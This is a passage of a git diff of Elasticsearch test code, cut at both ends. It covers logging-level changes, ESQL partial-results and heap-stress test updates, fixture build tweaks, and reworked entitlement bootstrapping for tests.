TimeUnit.SECONDS); + var completed = finished.await(30, TimeUnit.SECONDS); + assertTrue("Timeout when waiting for assertions to complete", completed); assertThat(assertions, equalTo(Collections.emptySet())); } @@ -143,5 +144,4 @@ private Map parseMap(String message) { return Collections.emptyMap(); } } - } diff --git a/test/external-modules/apm-integration/src/main/java/org/elasticsearch/test/apmintegration/TestMeterUsages.java b/test/external-modules/apm-integration/src/main/java/org/elasticsearch/test/apmintegration/TestMeterUsages.java index a0ae21b07379a..4b1f731510e01 100644 --- a/test/external-modules/apm-integration/src/main/java/org/elasticsearch/test/apmintegration/TestMeterUsages.java +++ b/test/external-modules/apm-integration/src/main/java/org/elasticsearch/test/apmintegration/TestMeterUsages.java @@ -39,22 +39,22 @@ public TestMeterUsages(MeterRegistry meterRegistry) { this.longHistogram = meterRegistry.registerLongHistogram("es.test.long_histogram.histogram", "test", "unit"); meterRegistry.registerDoubleGauge("es.test.double_gauge.current", "test", "unit", () -> { var value = doubleWithAttributes.get(); - logger.info("[es.test.double_gauge.current] callback with value [{}]", value); + logger.trace("[es.test.double_gauge.current] callback with value [{}]", value); return value; }); meterRegistry.registerLongGauge("es.test.long_gauge.current", "test", "unit", () -> { var value = longWithAttributes.get(); - logger.info("[es.test.long_gauge.current] callback with value [{}]", value); + logger.trace("[es.test.long_gauge.current] callback with value [{}]", value); return value; }); meterRegistry.registerLongAsyncCounter("es.test.async_long_counter.total", "test", "unit", () -> { var value = longWithAttributes.get(); - logger.info("[es.test.async_long_counter.total] callback with value [{}]", value); + logger.trace("[es.test.async_long_counter.total] callback with value [{}]", value); return value; }); meterRegistry.registerDoubleAsyncCounter("es.test.async_double_counter.total", "test", "unit", () -> { var value = doubleWithAttributes.get(); - logger.info("[es.test.async_double_counter.total] callback with value [{}]", value); + logger.trace("[es.test.async_double_counter.total] callback with value 
[{}]", value); return value; }); } @@ -69,7 +69,7 @@ public void testUponRequest() { longHistogram.record(2); // triggers gauges and async counters - logger.info("setting async counters"); + logger.trace("setting async counters"); doubleWithAttributes.set(new DoubleWithAttributes(1.0, Map.of())); longWithAttributes.set(new LongWithAttributes(1, Map.of())); } diff --git a/test/external-modules/delayed-aggs/src/main/java/org/elasticsearch/test/delayedshard/DelayedShardAggregationBuilder.java b/test/external-modules/delayed-aggs/src/main/java/org/elasticsearch/test/delayedshard/DelayedShardAggregationBuilder.java index 5aeef2abfed12..d7b9e82385ba5 100644 --- a/test/external-modules/delayed-aggs/src/main/java/org/elasticsearch/test/delayedshard/DelayedShardAggregationBuilder.java +++ b/test/external-modules/delayed-aggs/src/main/java/org/elasticsearch/test/delayedshard/DelayedShardAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.test.delayedshard; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.core.TimeValue; @@ -136,6 +135,6 @@ public int hashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/test/external-modules/error-query/src/javaRestTest/java/org/elasticsearch/test/esql/EsqlPartialResultsIT.java b/test/external-modules/error-query/src/javaRestTest/java/org/elasticsearch/test/esql/EsqlPartialResultsIT.java index 1a4299b0ce938..5f85dc8f3bec1 100644 --- a/test/external-modules/error-query/src/javaRestTest/java/org/elasticsearch/test/esql/EsqlPartialResultsIT.java +++ b/test/external-modules/error-query/src/javaRestTest/java/org/elasticsearch/test/esql/EsqlPartialResultsIT.java @@ -28,8 +28,8 @@ import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.greaterThan; import static org.hamcrest.Matchers.hasSize; -import static org.hamcrest.Matchers.lessThanOrEqualTo; public class EsqlPartialResultsIT extends ESRestTestCase { @ClassRule @@ -106,7 +106,11 @@ public void testPartialResult() throws Exception { Set okIds = populateIndices(); String query = """ { - "query": "FROM ok-index,failing-index | LIMIT 100 | KEEP fail_me,v" + "query": "FROM ok-index,failing-index | LIMIT 100 | KEEP fail_me,v", + "pragma": { + "max_concurrent_shards_per_node": 1 + }, + "accept_pragma_risks": true } """; // allow_partial_results = true @@ -123,7 +127,7 @@ public void testPartialResult() throws Exception { List columns = (List) results.get("columns"); assertThat(columns, equalTo(List.of(Map.of("name", "fail_me", "type", "long"), Map.of("name", "v", "type", "long")))); List values = (List) results.get("values"); - assertThat(values.size(), lessThanOrEqualTo(okIds.size())); + assertThat(values.size(), equalTo(okIds.size())); Map localInfo = (Map) XContentMapValues.extractValue( results, "_clusters", @@ -131,11 +135,10 @@ public void testPartialResult() throws Exception { "(local)" ); assertNotNull(localInfo); - assertThat(XContentMapValues.extractValue(localInfo, "_shards", "successful"), equalTo(0)); - assertThat( - XContentMapValues.extractValue(localInfo, "_shards", "failed"), - equalTo(XContentMapValues.extractValue(localInfo, "_shards", "total")) - ); + Integer successfulShards = (Integer) XContentMapValues.extractValue(localInfo, 
"_shards", "successful"); + Integer failedShards = (Integer) XContentMapValues.extractValue(localInfo, "_shards", "failed"); + assertThat(successfulShards, greaterThan(0)); + assertThat(failedShards, greaterThan(0)); List> failures = (List>) XContentMapValues.extractValue(localInfo, "failures"); assertThat(failures, hasSize(1)); assertThat( @@ -167,7 +170,11 @@ public void testFailureFromRemote() throws Exception { Set okIds = populateIndices(); String query = """ { - "query": "FROM *:ok-index,*:failing-index | LIMIT 100 | KEEP fail_me,v" + "query": "FROM *:ok-index,*:failing-index | LIMIT 100 | KEEP fail_me,v", + "pragma": { + "max_concurrent_shards_per_node": 1 + }, + "accept_pragma_risks": true } """; // allow_partial_results = true @@ -183,7 +190,7 @@ public void testFailureFromRemote() throws Exception { List columns = (List) results.get("columns"); assertThat(columns, equalTo(List.of(Map.of("name", "fail_me", "type", "long"), Map.of("name", "v", "type", "long")))); List values = (List) results.get("values"); - assertThat(values.size(), lessThanOrEqualTo(okIds.size())); + assertThat(values.size(), equalTo(okIds.size())); Map remoteCluster = (Map) XContentMapValues.extractValue( results, "_clusters", @@ -191,11 +198,10 @@ public void testFailureFromRemote() throws Exception { "cluster_one" ); assertNotNull(remoteCluster); - assertThat(XContentMapValues.extractValue(remoteCluster, "_shards", "successful"), equalTo(0)); - assertThat( - XContentMapValues.extractValue(remoteCluster, "_shards", "failed"), - equalTo(XContentMapValues.extractValue(remoteCluster, "_shards", "total")) - ); + Integer successfulShards = (Integer) XContentMapValues.extractValue(remoteCluster, "_shards", "successful"); + Integer failedShards = (Integer) XContentMapValues.extractValue(remoteCluster, "_shards", "failed"); + assertThat(successfulShards, greaterThan(0)); + assertThat(failedShards, greaterThan(0)); List> failures = (List>) XContentMapValues.extractValue(remoteCluster, "failures"); assertThat(failures, hasSize(1)); assertThat( @@ -207,6 +213,25 @@ public void testFailureFromRemote() throws Exception { } } + public void testAllShardsFailed() throws Exception { + setupRemoteClusters(); + populateIndices(); + try { + for (boolean allowPartialResults : List.of(Boolean.TRUE, Boolean.FALSE)) { + for (String index : List.of("failing*", "*:failing*", "*:failing*,failing*")) { + Request request = new Request("POST", "/_query"); + request.setJsonEntity("{\"query\": \"FROM " + index + " | LIMIT 100\"}"); + request.addParameter("allow_partial_results", Boolean.toString(allowPartialResults)); + var error = expectThrows(ResponseException.class, () -> client().performRequest(request)); + Response resp = error.getResponse(); + assertThat(EntityUtils.toString(resp.getEntity()), containsString("Accessing failing field")); + } + } + } finally { + removeRemoteCluster(); + } + } + private void setupRemoteClusters() throws IOException { String settings = String.format(Locale.ROOT, """ { diff --git a/test/external-modules/error-query/src/main/java/org/elasticsearch/test/errorquery/ErrorQueryBuilder.java b/test/external-modules/error-query/src/main/java/org/elasticsearch/test/errorquery/ErrorQueryBuilder.java index 3e4d52b5a66c7..ae6413c7efb5b 100644 --- a/test/external-modules/error-query/src/main/java/org/elasticsearch/test/errorquery/ErrorQueryBuilder.java +++ b/test/external-modules/error-query/src/main/java/org/elasticsearch/test/errorquery/ErrorQueryBuilder.java @@ -16,7 +16,6 @@ import org.apache.lucene.search.ScoreMode; 
import org.apache.lucene.search.Weight; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.logging.HeaderWarning; @@ -166,7 +165,7 @@ protected int doHashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } static void sleep(long millis) { diff --git a/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/Clusters.java b/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/Clusters.java index 1c237404a78cc..bc5e1f123fe81 100644 --- a/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/Clusters.java +++ b/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/Clusters.java @@ -22,6 +22,7 @@ static ElasticsearchCluster buildCluster() { .setting("xpack.security.enabled", "false") .setting("xpack.license.self_generated.type", "trial") .setting("esql.query.allow_partial_results", "false") + .setting("logger.org.elasticsearch.compute.lucene.read", "DEBUG") .jvmArg("-Xmx512m"); String javaVersion = JvmInfo.jvmInfo().version(); if (javaVersion.equals("20") || javaVersion.equals("21")) { diff --git a/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/HeapAttackIT.java b/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/HeapAttackIT.java index 3912a63ef1514..8ae9db4c904c9 100644 --- a/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/HeapAttackIT.java +++ b/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/HeapAttackIT.java @@ -570,7 +570,7 @@ protected RestClient buildClient(Settings settings, HttpHost[] hosts) throws IOE } public void testFetchManyBigFields() throws IOException { - initManyBigFieldsIndex(100); + initManyBigFieldsIndex(100, "keyword"); Map response = fetchManyBigFields(100); ListMatcher columns = matchesList(); for (int f = 0; f < 1000; f++) { @@ -580,7 +580,7 @@ public void testFetchManyBigFields() throws IOException { } public void testFetchTooManyBigFields() throws IOException { - initManyBigFieldsIndex(500); + initManyBigFieldsIndex(500, "keyword"); // 500 docs is plenty to circuit break on most nodes assertCircuitBreaks(attempt -> fetchManyBigFields(attempt * 500)); } @@ -594,6 +594,58 @@ private Map fetchManyBigFields(int docs) throws IOException { return responseAsMap(query(query.toString(), "columns")); } + public void testAggManyBigTextFields() throws IOException { + int docs = 100; + int fields = 100; + initManyBigFieldsIndex(docs, "text"); + Map response = aggManyBigFields(fields); + ListMatcher columns = matchesList().item(matchesMap().entry("name", "sum").entry("type", "long")); + assertMap( + response, + matchesMap().entry("columns", columns).entry("values", matchesList().item(matchesList().item(1024 * fields * docs))) + ); + } + + /** + * Aggregates documents containing many fields which are {@code 1kb} each. 
+ */ + private Map aggManyBigFields(int fields) throws IOException { + StringBuilder query = startQuery(); + query.append("FROM manybigfields | STATS sum = SUM("); + query.append("LENGTH(f").append(String.format(Locale.ROOT, "%03d", 0)).append(")"); + for (int f = 1; f < fields; f++) { + query.append(" + LENGTH(f").append(String.format(Locale.ROOT, "%03d", f)).append(")"); + } + query.append(")\"}"); + return responseAsMap(query(query.toString(), "columns,values")); + } + + /** + * Aggregates on the {@code LENGTH} of a giant text field. Without + * splitting pages on load (#131053) this throws a {@link CircuitBreakingException} + * when it tries to load a giant field. With that change it finishes + * after loading many single-row pages. + */ + public void testAggGiantTextField() throws IOException { + int docs = 100; + initGiantTextField(docs); + Map response = aggGiantTextField(); + ListMatcher columns = matchesList().item(matchesMap().entry("name", "sum").entry("type", "long")); + assertMap( + response, + matchesMap().entry("columns", columns).entry("values", matchesList().item(matchesList().item(1024 * 1024 * 5 * docs))) + ); + } + + /** + * Aggregates documents containing a text field that is {@code 1mb} each. + */ + private Map aggGiantTextField() throws IOException { + StringBuilder query = startQuery(); + query.append("FROM bigtext | STATS sum = SUM(LENGTH(f))\"}"); + return responseAsMap(query(query.toString(), "columns,values")); + } + public void testAggMvLongs() throws IOException { int fieldValues = 100; initMvLongsIndex(1, 3, fieldValues); @@ -788,7 +840,7 @@ private void initSingleDocIndex() throws IOException { """); } - private void initManyBigFieldsIndex(int docs) throws IOException { + private void initManyBigFieldsIndex(int docs, String type) throws IOException { logger.info("loading many documents with many big fields"); int docsPerBulk = 5; int fields = 1000; @@ -799,7 +851,7 @@ private void initManyBigFieldsIndex(int docs) throws IOException { config.startObject("settings").field("index.mapping.total_fields.limit", 10000).endObject(); config.startObject("mappings").startObject("properties"); for (int f = 0; f < fields; f++) { - config.startObject("f" + String.format(Locale.ROOT, "%03d", f)).field("type", "keyword").endObject(); + config.startObject("f" + String.format(Locale.ROOT, "%03d", f)).field("type", type).endObject(); } config.endObject().endObject(); request.setJsonEntity(Strings.toString(config.endObject())); @@ -831,6 +883,46 @@ private void initManyBigFieldsIndex(int docs) throws IOException { initIndex("manybigfields", bulk.toString()); } + private void initGiantTextField(int docs) throws IOException { + int docsPerBulk = 10; + for (Map nodeInfo : getNodesInfo(adminClient()).values()) { + for (Object module : (List) nodeInfo.get("modules")) { + Map moduleInfo = (Map) module; + final String moduleName = moduleInfo.get("name").toString(); + if (moduleName.startsWith("serverless-")) { + docsPerBulk = 3; + } + } + } + logger.info("loading many documents with one big text field - docs per bulk {}", docsPerBulk); + int fieldSize = Math.toIntExact(ByteSizeValue.ofMb(5).getBytes()); + + Request request = new Request("PUT", "/bigtext"); + XContentBuilder config = JsonXContent.contentBuilder().startObject(); + config.startObject("mappings").startObject("properties"); + config.startObject("f").field("type", "text").endObject(); + config.endObject().endObject(); + request.setJsonEntity(Strings.toString(config.endObject())); + Response response = 
client().performRequest(request); + assertThat( + EntityUtils.toString(response.getEntity(), StandardCharsets.UTF_8), + equalTo("{\"acknowledged\":true,\"shards_acknowledged\":true,\"index\":\"bigtext\"}") + ); + + StringBuilder bulk = new StringBuilder(); + for (int d = 0; d < docs; d++) { + bulk.append("{\"create\":{}}\n"); + bulk.append("{\"f\":\""); + bulk.append(Integer.toString(d % 10).repeat(fieldSize)); + bulk.append("\"}\n"); + if (d % docsPerBulk == docsPerBulk - 1 && d != docs - 1) { + bulk("bigtext", bulk.toString()); + bulk.setLength(0); + } + } + initIndex("bigtext", bulk.toString()); + } + private void initMvLongsIndex(int docs, int fields, int fieldValues) throws IOException { logger.info("loading documents with many multivalued longs"); int docsPerBulk = 100; @@ -969,6 +1061,15 @@ private void bulk(String name, String bulk) throws IOException { ); Response response = client().performRequest(request); assertThat(entityAsMap(response), matchesMap().entry("errors", false).extraOk()); + + /* + * Flush after each bulk to clear the test-time seenSequenceNumbers Map in + * TranslogWriter. Without this the server will OOM from time to time keeping + * stuff around to run assertions on. + */ + request = new Request("POST", "/" + name + "/_flush"); + response = client().performRequest(request); + assertThat(entityAsMap(response), matchesMap().entry("_shards", matchesMap().extraOk().entry("failed", 0)).extraOk()); } private void initIndex(String name, String bulk) throws IOException { diff --git a/test/external-modules/multi-project/src/test/java/org/elasticsearch/multiproject/action/DeleteProjectActionTests.java b/test/external-modules/multi-project/src/test/java/org/elasticsearch/multiproject/action/DeleteProjectActionTests.java index 1fb11acb550f7..5f71fccb73888 100644 --- a/test/external-modules/multi-project/src/test/java/org/elasticsearch/multiproject/action/DeleteProjectActionTests.java +++ b/test/external-modules/multi-project/src/test/java/org/elasticsearch/multiproject/action/DeleteProjectActionTests.java @@ -64,7 +64,7 @@ public void testDeleteNonExisting() throws Exception { ); var nonExistingTask = createTask(randomUniqueProjectId(), listener); var tasks = Stream.concat(Stream.of(nonExistingTask), deletedProjects.stream().map(this::createTask)).toList(); - var result = ClusterStateTaskExecutorUtils.executeIgnoringFailures(state, executor, tasks); + var result = ClusterStateTaskExecutorUtils.executeHandlingResults(state, executor, tasks, t -> {}, DeleteProjectTask::onFailure); for (ProjectId deletedProject : deletedProjects) { assertNull(result.metadata().projects().get(deletedProject)); assertNull(result.globalRoutingTable().routingTables().get(deletedProject)); diff --git a/test/fixtures/hdfs-fixture/build.gradle b/test/fixtures/hdfs-fixture/build.gradle index b716659648cf1..4c8e145f19551 100644 --- a/test/fixtures/hdfs-fixture/build.gradle +++ b/test/fixtures/hdfs-fixture/build.gradle @@ -148,6 +148,7 @@ tasks.named("shadowJar").configure { relocate("org.apache.hadoop", "fixture.hdfs3.org.apache.hadoop") { exclude "org.apache.hadoop.hdfs.protocol.ClientProtocol" exclude "org.apache.hadoop.ipc.StandbyException" + exclude "org.apache.hadoop.application-classloader.properties" } configurations.add(project.configurations.hdfs3) } @@ -156,6 +157,7 @@ def hdfs2Jar = tasks.register("hdfs2jar", ShadowJar) { relocate("org.apache.hadoop", "fixture.hdfs2.org.apache.hadoop") { exclude "org.apache.hadoop.hdfs.protocol.ClientProtocol" exclude "org.apache.hadoop.ipc.StandbyException" 
+ exclude "org.apache.hadoop.application-classloader.properties" } archiveClassifier.set("hdfs2") from sourceSets.main.output @@ -173,6 +175,10 @@ tasks.withType(ShadowJar).configureEach { exclude(dependency('com.fasterxml.jackson.core:.*:.*')) } + filesMatching("META-INF/services/**") { + duplicatesStrategy = DuplicatesStrategy.INCLUDE // Or something else. + } + transform(org.elasticsearch.gradle.internal.shadow.XmlClassRelocationTransformer.class) { resource = "core-default.xml" enabled = true diff --git a/test/fixtures/minio-fixture/src/main/java/org/elasticsearch/test/fixtures/minio/MinioTestContainer.java b/test/fixtures/minio-fixture/src/main/java/org/elasticsearch/test/fixtures/minio/MinioTestContainer.java index 64518cde6dd16..29cb2607844cc 100644 --- a/test/fixtures/minio-fixture/src/main/java/org/elasticsearch/test/fixtures/minio/MinioTestContainer.java +++ b/test/fixtures/minio-fixture/src/main/java/org/elasticsearch/test/fixtures/minio/MinioTestContainer.java @@ -15,9 +15,10 @@ public final class MinioTestContainer extends DockerEnvironmentAwareTestContainer { - // NB releases earlier than 2025-05-24 are buggy, see https://github.com/minio/minio/issues/21189, and #127166 for a workaround - // However the 2025-05-24 release is also buggy, see https://github.com/minio/minio/issues/21377, and this has no workaround - public static final String DOCKER_BASE_IMAGE = "minio/minio:RELEASE.2025-06-13T11-33-47Z"; + // NB releases earlier than 2025-05-24 are buggy, see https://github.com/minio/minio/issues/21189, and #127166 for a workaround. + // However the 2025-05-24 release is also buggy, see https://github.com/minio/minio/issues/21377, and this has no workaround. + // Also https://github.com/minio/minio/issues/21456 seems to affect releases newer than 2025-05-24, see #131815 for workaround. + public static final String DOCKER_BASE_IMAGE = "minio/minio:RELEASE.2025-07-23T15-54-02Z"; private static final int servicePort = 9000; private final boolean enabled; diff --git a/test/framework/src/main/java/org/elasticsearch/bootstrap/BootstrapForTesting.java b/test/framework/src/main/java/org/elasticsearch/bootstrap/BootstrapForTesting.java index 318f2ce863173..bf53f14bc9e46 100644 --- a/test/framework/src/main/java/org/elasticsearch/bootstrap/BootstrapForTesting.java +++ b/test/framework/src/main/java/org/elasticsearch/bootstrap/BootstrapForTesting.java @@ -15,6 +15,7 @@ import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.Booleans; import org.elasticsearch.core.PathUtils; +import org.elasticsearch.entitlement.bootstrap.TestEntitlementBootstrap; import org.elasticsearch.jdk.JarHell; import java.io.IOException; @@ -71,6 +72,13 @@ public class BootstrapForTesting { // Log ifconfig output before SecurityManager is installed IfConfig.logIfNecessary(); + + // Fire up entitlements + try { + TestEntitlementBootstrap.bootstrap(javaTmpDir); + } catch (IOException e) { + throw new IllegalStateException(e.getClass().getSimpleName() + " while initializing entitlements for tests", e); + } } // does nothing, just easy way to make sure the class is loaded. 
diff --git a/test/framework/src/main/java/org/elasticsearch/bootstrap/TestScopeResolver.java b/test/framework/src/main/java/org/elasticsearch/bootstrap/TestScopeResolver.java index c29bd84d1fda9..3a42485822f3c 100644 --- a/test/framework/src/main/java/org/elasticsearch/bootstrap/TestScopeResolver.java +++ b/test/framework/src/main/java/org/elasticsearch/bootstrap/TestScopeResolver.java @@ -16,11 +16,15 @@ import java.net.MalformedURLException; import java.net.URL; -import java.util.HashMap; import java.util.List; import java.util.Map; +import java.util.Set; +import java.util.TreeMap; import java.util.function.Function; +import static org.elasticsearch.entitlement.runtime.policy.PolicyManager.ALL_UNNAMED; +import static org.elasticsearch.entitlement.runtime.policy.PolicyManager.ComponentKind.PLUGIN; + public record TestScopeResolver(Map scopeMap) { private static final Logger logger = LogManager.getLogger(TestScopeResolver.class); @@ -31,6 +35,13 @@ PolicyManager.PolicyScope getScope(Class callerClass) { var location = callerCodeSource.getLocation().toString(); var scope = scopeMap.get(location); + if (scope == null) { + // Special cases for libraries not handled by our automatically-generated scopeMap + if (callerClass.getPackageName().startsWith("org.bouncycastle")) { + scope = new PolicyManager.PolicyScope(PLUGIN, "security", ALL_UNNAMED); + logger.debug("Assuming bouncycastle is part of the security plugin"); + } + } if (scope == null) { logger.warn("Cannot identify a scope for class [{}], location [{}]", callerClass.getName(), location); return PolicyManager.PolicyScope.unknown(location); @@ -40,20 +51,22 @@ PolicyManager.PolicyScope getScope(Class callerClass) { public static Function, PolicyManager.PolicyScope> createScopeResolver( TestBuildInfo serverBuildInfo, - List pluginsBuildInfo + List pluginsBuildInfo, + Set modularPlugins ) { - - Map scopeMap = new HashMap<>(); + Map scopeMap = new TreeMap<>(); // Sorted to make it easier to read during debugging for (var pluginBuildInfo : pluginsBuildInfo) { + boolean isModular = modularPlugins.contains(pluginBuildInfo.component()); for (var location : pluginBuildInfo.locations()) { var codeSource = TestScopeResolver.class.getClassLoader().getResource(location.representativeClass()); if (codeSource == null) { throw new IllegalArgumentException("Cannot locate class [" + location.representativeClass() + "]"); } try { + String module = isModular ? 
location.module() : ALL_UNNAMED; scopeMap.put( getCodeSource(codeSource, location.representativeClass()), - PolicyManager.PolicyScope.plugin(pluginBuildInfo.component(), location.module()) + PolicyManager.PolicyScope.plugin(pluginBuildInfo.component(), module) ); } catch (MalformedURLException e) { throw new IllegalArgumentException("Cannot locate class [" + location.representativeClass() + "]", e); @@ -64,7 +77,8 @@ public static Function, PolicyManager.PolicyScope> createScopeResolver( for (var location : serverBuildInfo.locations()) { var classUrl = TestScopeResolver.class.getClassLoader().getResource(location.representativeClass()); if (classUrl == null) { - throw new IllegalArgumentException("Cannot locate class [" + location.representativeClass() + "]"); + logger.debug("Representative class is unavailable; proceeding without {}", location); + continue; } try { scopeMap.put(getCodeSource(classUrl, location.representativeClass()), PolicyManager.PolicyScope.server(location.module())); diff --git a/test/framework/src/main/java/org/elasticsearch/cluster/metadata/DataStreamTestHelper.java b/test/framework/src/main/java/org/elasticsearch/cluster/metadata/DataStreamTestHelper.java index 7c78c82f75f0e..60154d910334a 100644 --- a/test/framework/src/main/java/org/elasticsearch/cluster/metadata/DataStreamTestHelper.java +++ b/test/framework/src/main/java/org/elasticsearch/cluster/metadata/DataStreamTestHelper.java @@ -183,7 +183,11 @@ public static DataStream newInstance( .setReplicated(replicated) .setLifecycle(lifecycle) .setDataStreamOptions(dataStreamOptions) - .setFailureIndices(DataStream.DataStreamIndices.failureIndicesBuilder(failureStores).build()) + .setFailureIndices( + DataStream.DataStreamIndices.failureIndicesBuilder(failureStores) + .setRolloverOnWrite((replicated == false) && (failureStores.isEmpty())) + .build() + ) .build(); } @@ -390,7 +394,7 @@ public static DataStream randomInstance(String dataStreamName, LongSupplier time ) .build(), DataStream.DataStreamIndices.failureIndicesBuilder(failureIndices) - .setRolloverOnWrite(failureStore && replicated == false && randomBoolean()) + .setRolloverOnWrite(replicated == false && (failureIndices.isEmpty() || randomBoolean())) .setAutoShardingEvent( failureStore && randomBoolean() ? 
new DataStreamAutoShardingEvent( diff --git a/test/framework/src/main/java/org/elasticsearch/cluster/routing/TestShardRouting.java b/test/framework/src/main/java/org/elasticsearch/cluster/routing/TestShardRouting.java index 731faccdeede1..84e1dd532e2b7 100644 --- a/test/framework/src/main/java/org/elasticsearch/cluster/routing/TestShardRouting.java +++ b/test/framework/src/main/java/org/elasticsearch/cluster/routing/TestShardRouting.java @@ -131,6 +131,16 @@ public static ShardRouting newShardRouting(ShardId shardId, String currentNodeId return newShardRouting(shardId, currentNodeId, primary, state, ShardRouting.Role.DEFAULT); } + public static ShardRouting newShardRouting( + ShardId shardId, + String currentNodeId, + boolean primary, + ShardRoutingState state, + RecoverySource recoverySource + ) { + return newShardRouting(shardId, currentNodeId, primary, state, recoverySource, ShardRouting.Role.DEFAULT); + } + public static ShardRouting newShardRouting( ShardId shardId, String currentNodeId, @@ -154,6 +164,30 @@ public static ShardRouting newShardRouting( ); } + public static ShardRouting newShardRouting( + ShardId shardId, + String currentNodeId, + boolean primary, + ShardRoutingState state, + RecoverySource recoverySource, + ShardRouting.Role role + ) { + assertNotEquals(ShardRoutingState.RELOCATING, state); + return new ShardRouting( + shardId, + currentNodeId, + null, + primary, + state, + recoverySource, + buildUnassignedInfo(state), + buildRelocationFailureInfo(state), + buildAllocationId(state), + ShardRouting.UNAVAILABLE_EXPECTED_SHARD_SIZE, + role + ); + } + public static ShardRouting newShardRouting( String index, int shardId, diff --git a/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestEntitlementBootstrap.java b/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestEntitlementBootstrap.java index f4573f5061cc9..2e9ffc7558280 100644 --- a/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestEntitlementBootstrap.java +++ b/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestEntitlementBootstrap.java @@ -12,7 +12,9 @@ import org.elasticsearch.bootstrap.TestBuildInfo; import org.elasticsearch.bootstrap.TestBuildInfoParser; import org.elasticsearch.bootstrap.TestScopeResolver; -import org.elasticsearch.core.Strings; +import org.elasticsearch.common.Strings; +import org.elasticsearch.core.Booleans; +import org.elasticsearch.core.PathUtils; import org.elasticsearch.core.SuppressForbidden; import org.elasticsearch.entitlement.initialization.EntitlementInitialization; import org.elasticsearch.entitlement.runtime.policy.PathLookup; @@ -26,78 +28,112 @@ import java.io.IOException; import java.io.InputStream; +import java.net.URI; import java.net.URL; import java.nio.file.Path; import java.util.ArrayList; +import java.util.Arrays; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.Set; -import java.util.stream.Stream; +import java.util.TreeSet; -public class TestEntitlementBootstrap { +import static java.util.stream.Collectors.toCollection; +import static java.util.stream.Collectors.toSet; +public class TestEntitlementBootstrap { private static final Logger logger = LogManager.getLogger(TestEntitlementBootstrap.class); + private static TestPathLookup TEST_PATH_LOOKUP; + private static TestPolicyManager POLICY_MANAGER; + /** * Activates entitlement checking in tests. 
*/ - public static void bootstrap() throws IOException { - TestPathLookup pathLookup = new TestPathLookup(); - EntitlementInitialization.initializeArgs = new EntitlementInitialization.InitializeArgs( - pathLookup, - Set.of(), - createPolicyManager(pathLookup) - ); - logger.debug("Loading entitlement agent"); - EntitlementBootstrap.loadAgent(EntitlementBootstrap.findAgentJar(), EntitlementInitialization.class.getName()); - } - - private record TestPathLookup() implements PathLookup { - @Override - public Path pidFile() { - return null; + public static void bootstrap(Path tempDir) throws IOException { + if (isEnabledForTests() == false) { + return; } + assert POLICY_MANAGER == null && TEST_PATH_LOOKUP == null : "Test entitlement bootstrap called multiple times"; + TEST_PATH_LOOKUP = new TestPathLookup(tempDir); + POLICY_MANAGER = createPolicyManager(TEST_PATH_LOOKUP); + loadAgent(POLICY_MANAGER, TEST_PATH_LOOKUP); + } - @Override - public Stream getBaseDirPaths(BaseDir baseDir) { - return Stream.empty(); - } + public static boolean isEnabledForTests() { + return Booleans.parseBoolean(System.getProperty("es.entitlement.enableForTests", "false")); + } - @Override - public Stream resolveSettingPaths(BaseDir baseDir, String settingName) { - return Stream.empty(); - } + static TestPolicyManager testPolicyManager() { + return POLICY_MANAGER; + } + static TestPathLookup testPathLookup() { + return TEST_PATH_LOOKUP; } - private static PolicyManager createPolicyManager(PathLookup pathLookup) throws IOException { + private static void loadAgent(PolicyManager policyManager, PathLookup pathLookup) { + logger.debug("Loading entitlement agent"); + EntitlementInitialization.initializeArgs = new EntitlementInitialization.InitializeArgs(pathLookup, Set.of(), policyManager); + EntitlementBootstrap.loadAgent(EntitlementBootstrap.findAgentJar(), EntitlementInitialization.class.getName()); + } + private static TestPolicyManager createPolicyManager(PathLookup pathLookup) throws IOException { var pluginsTestBuildInfo = TestBuildInfoParser.parseAllPluginTestBuildInfo(); var serverTestBuildInfo = TestBuildInfoParser.parseServerTestBuildInfo(); - var scopeResolver = TestScopeResolver.createScopeResolver(serverTestBuildInfo, pluginsTestBuildInfo); List pluginNames = pluginsTestBuildInfo.stream().map(TestBuildInfo::component).toList(); var pluginDescriptors = parsePluginsDescriptors(pluginNames); + Set modularPlugins = pluginDescriptors.stream() + .filter(PluginDescriptor::isModular) + .map(PluginDescriptor::getName) + .collect(toSet()); + var scopeResolver = TestScopeResolver.createScopeResolver(serverTestBuildInfo, pluginsTestBuildInfo, modularPlugins); var pluginsData = pluginDescriptors.stream() .map(descriptor -> new TestPluginData(descriptor.getName(), descriptor.isModular(), false)) .toList(); Map pluginPolicies = parsePluginsPolicies(pluginsData); + String separator = System.getProperty("path.separator"); + + // In production, plugins would have access to their respective bundle directories, + // and so they'd be able to read from their jars. In testing, we approximate this + // by considering the entire classpath to be "source paths" of all plugins. This + // also has the effect of granting read access to everything on the test-only classpath, + // which is fine, because any entitlement errors there could only be false positives. 
